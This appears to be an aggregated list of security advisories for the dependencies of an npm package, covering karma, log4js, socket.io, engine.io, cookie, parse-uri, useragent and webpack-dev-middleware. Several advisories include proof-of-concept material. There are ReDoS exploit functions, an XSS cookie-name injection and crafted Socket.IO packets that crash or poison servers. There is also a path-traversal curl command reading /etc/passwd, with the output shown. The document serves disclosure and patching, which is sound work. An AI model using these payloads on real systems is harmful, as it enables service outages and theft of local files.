All the vulnerabilities related to the version 1.4.0 of the package
Cross-site Scripting in karma
karma prior to version 6.3.14 contains a cross-site scripting vulnerability.
Open redirect in karma
Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.
Incorrect Default Permissions in log4js
Default file permissions for log files created by the file, fileSync and dateFile appenders are world-readable (in unix). This could cause problems if log files contain sensitive information. This would affect any users that have not supplied their own permissions for the files via the mode parameter in the config.
Fixed by:
Released to NPM in log4js@6.4.0
Every version of log4js published allows passing the mode parameter to the configuration of file appenders, see the documentation for details.
Thanks to ranjit-git for raising the issue, and to @lamweili for fixing the problem.
If you have any questions or comments about this advisory:
socket.io has an unhandled 'error' event
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
node:events:502
throw err; // Unhandled 'error' event
^
Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
at new NodeError (node:internal/errors:405:5)
at Socket.emit (node:events:500:17)
at /myapp/node_modules/socket.io/lib/socket.js:531:14
at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
code: 'ERR_UNHANDLED_ERROR',
context: undefined
}
| Version range | Needs minor update? |
|------------------|------------------------------------------------|
| 4.6.2...latest
| Nothing to do |
| 3.0.0...4.6.1
| Please upgrade to socket.io@4.6.2
(at least) |
| 2.3.0...2.5.0
| Please upgrade to socket.io@2.5.1
|
This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2
(released in May 2023).
The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
As a workaround for the affected versions of the socket.io
package, you can attach a listener for the "error" event:
io.on("connection", (socket) => {
socket.on("error", () => {
// ...
});
});
If you have any questions or comments about this advisory:
Thanks a lot to Paul Taylor for the responsible disclosure.
CORS misconfiguration in socket.io
The package socket.io before 2.4.0 are vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.
Resource exhaustion in engine.io
Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.
Uncaught exception in engine.io
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
events.js:292
throw er; // Unhandled 'error' event
^
Error: read ECONNRESET
at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
at emitErrorNT (internal/streams/destroy.js:106:8)
at emitErrorCloseNT (internal/streams/destroy.js:74:3)
at processTicksAndRejections (internal/process/task_queues.js:80:21) {
errno: -104,
code: 'ECONNRESET',
syscall: 'read'
}
This impacts all the users of the engine.io
package, including those who uses depending packages like socket.io
.
A fix has been released today (2022/11/20):
| Version range | Fixed version |
|-------------------|---------------|
| engine.io@3.x.y
| 3.6.1
|
| engine.io@6.x.y
| 6.2.1
|
For socket.io
users:
| Version range | engine.io
version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------|
| socket.io@4.5.x
| ~6.2.0
| npm audit fix
should be sufficient |
| socket.io@4.4.x
| ~6.1.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.3.x
| ~6.0.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.2.x
| ~5.2.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.1.x
| ~5.1.1
| Please upgrade to socket.io@4.5.x
|
| socket.io@4.0.x
| ~5.0.0
| Please upgrade to socket.io@4.5.x
|
| socket.io@3.1.x
| ~4.1.0
| Please upgrade to socket.io@4.5.x
(see here) |
| socket.io@3.0.x
| ~4.0.0
| Please upgrade to socket.io@4.5.x
(see here) |
| socket.io@2.5.0
| ~3.6.0
| npm audit fix
should be sufficient |
| socket.io@2.4.x
and below | ~3.5.0
| Please upgrade to socket.io@2.5.0
|
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
engine.io
Thanks to Jonathan Neve for the responsible disclosure.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value)
would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test"
, setting userName
cookie to <script>
and ignoring value
.
A similar escape can be used for path
and domain
, which could be abused to alter other fields of the cookie.
Upgrade to 0.7.0, which updates the validation for name
, path
, and domain
.
Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
async function exploit() {
const parseuri = require("parse-uri");
// This input is designed to cause excessive backtracking in the regex
const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
const result = await parseuri(craftedInput);
}
await exploit();
Improper Certificate Validation in xmlhttprequest-ssl
The xmlhttprequest-ssl package before 1.6.1 for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.
xmlhttprequest and xmlhttprequest-ssl vulnerable to Arbitrary Code Injection
This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False
on xhr.open
), malicious user input flowing into xhr.send
could result in arbitrary code being injected and run.
Insufficient validation when decoding a Socket.IO packet
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
TypeError: Cannot convert object to primitive value
at Socket.emit (node:events:507:25)
at .../node_modules/socket.io/lib/socket.js:531:14
A fix has been released today (2023/05/22):
socket.io-parser@4.2.3
socket.io-parser@3.4.3
Another fix has been released for the 3.3.x
branch:
| socket.io
version | socket.io-parser
version | Needs minor update? |
|---------------------|---------------------------------------------------------------------------------------------------------|--------------------------------------|
| 4.5.2...latest
| ~4.2.0
(ref) | npm audit fix
should be sufficient |
| 4.1.3...4.5.1
| ~4.1.1
(ref) | Please upgrade to socket.io@4.6.x
|
| 3.0.5...4.1.2
| ~4.0.3
(ref) | Please upgrade to socket.io@4.6.x
|
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Please upgrade to socket.io@4.6.x
|
| 2.3.0...2.5.0
| ~3.4.0
(ref) | npm audit fix
should be sufficient |
There is no known workaround except upgrading to a safe version.
If you have any questions or comments about this advisory:
Thanks to @rafax00 for the responsible disclosure.
Insufficient validation when decoding a Socket.IO packet
Due to improper type validation in the socket.io-parser
library (which is used by the socket.io
and socket.io-client
packages to encode and decode Socket.IO packets), it is possible to overwrite the _placeholder object which allows an attacker to place references to functions at arbitrary places in the resulting query object.
Example:
const decoder = new Decoder();
decoder.on("decoded", (packet) => {
console.log(packet.data); // prints [ 'hello', [Function: splice] ]
})
decoder.add('51-["hello",{"_placeholder":true,"num":"splice"}]');
decoder.add(Buffer.from("world"));
This bubbles up in the socket.io
package:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// here, "val" could be a function instead of a buffer
});
});
:warning: IMPORTANT NOTE :warning:
You need to make sure that the payload that you received from the client is actually a Buffer
object:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
if (!Buffer.isBuffer(val)) {
socket.disconnect();
return;
}
// ...
});
});
If that's already the case, then you are not impacted by this issue, and there is no way an attacker could make your server crash (or escalate privileges, ...).
Example of values that could be sent by a malicious user:
Sample packet: 451-["hello",{"_placeholder":true,"num":10}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
undefined
Sample packet: 451-["hello",{"_placeholder":true,"num":undefined}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
Array
, like "push"Sample packet: 451-["hello",{"_placeholder":true,"num":"push"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "push" function
});
});
Object
, like "hasOwnProperty"Sample packet: 451-["hello",{"_placeholder":true,"num":"hasOwnProperty"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "hasOwnProperty" function
});
});
This should be fixed by:
socket.io-parser@4.2.1
socket.io-parser@4.0.5
socket.io-parser@3.4.2
socket.io-parser@3.3.3
socket.io
package| socket.io
version | socket.io-parser
version | Covered? |
|---------------------|---------------------------------------------------------------------------------------------------------|------------------------|
| 4.5.2...latest
| ~4.2.0
(ref) | Yes :heavy_check_mark: |
| 4.1.3...4.5.1
| ~4.0.4
(ref) | Yes :heavy_check_mark: |
| 3.0.5...4.1.2
| ~4.0.3
(ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Yes :heavy_check_mark: |
| 2.3.0...2.5.0
| ~3.4.0
(ref) | Yes :heavy_check_mark: |
socket.io-client
package| socket.io-client
version | socket.io-parser
version | Covered? |
|----------------------------|----------------------------------------------------------------------------------------------------------------|------------------------------------|
| 4.5.0...latest
| ~4.2.0
(ref) | Yes :heavy_check_mark: |
| 4.3.0...4.4.1
| ~4.1.1
(ref) | No, but the impact is very limited |
| 3.1.0...4.2.0
| ~4.0.4
(ref) | Yes :heavy_check_mark: |
| 3.0.5
| ~4.0.3
(ref) | Yes :heavy_check_mark: |
| 3.0.0...3.0.4
| ~4.0.1
(ref) | Yes :heavy_check_mark: |
| 2.2.0...2.5.0
| ~3.3.0
(ref) | Yes :heavy_check_mark: |
Resource exhaustion in socket.io-parser
The socket.io-parser
npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.
useragent Regular Expression Denial of Service vulnerability
Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).
async function exploit() {
const useragent = require(\"useragent\");
// Create a malicious user-agent that leads to excessive backtracking
const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
// Parse the malicious user-agent
const agent = useragent.parse(maliciousUserAgent);
// Call the toString method to trigger the vulnerability
const result = await agent.device.toString();
console.log(result);
}
await exploit();
Path traversal in webpack-dev-middleware
The webpack-dev-middleware middleware does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine.
The middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory memfs filesystem. If writeToDisk configuration option is set to true, the physical filesystem is used: https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21
The getFilenameFromUrl method is used to parse URL and build the local file path. The public path prefix is stripped from the URL, and the unsecaped path suffix is appended to the outputPath: https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82 As the URL is not unescaped and normalized automatically before calling the midlleware, it is possible to use %2e and %2f sequences to perform path traversal attack.
A blank project can be created containing the following configuration file webpack.config.js:
module.exports = { devServer: { devMiddleware: { writeToDisk: true } } };
When started, it is possible to access any local file, e.g. /etc/passwd:
$ curl localhost:8080/public/..%2f..%2f..%2f..%2f../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
The developers using webpack-dev-server or webpack-dev-middleware are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content (e.g. password, configuration files, private source code, ...).
If the development server is listening on a public IP address (or 0.0.0.0), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port).
If the server allows access from third-party domains (CORS, Allow-Access-Origin: * ), an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files.
The URL should be unescaped and normalized before any further processing.